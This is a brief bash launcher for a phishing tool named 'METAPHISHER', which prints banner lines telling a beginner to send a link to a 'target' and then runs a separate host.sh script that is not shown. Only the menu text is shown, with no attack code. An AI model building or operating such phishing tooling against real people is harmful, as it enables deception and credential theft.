#!bin/bash
clear
echo "METAPHISHER STARTED..."
echo
echo
echo "Tool By nerdhacker000 On Github, Made For Beginners"
echo "---------------------------------------" 
echo "1. Type your email and send link to target"
echo "---------------------------------------" 
echo "2. Send link to your target."
echo "---------------------------------------" 
echo "3 Go to my website for more: nerdhaka.blogspot.com" 
sh host.sh
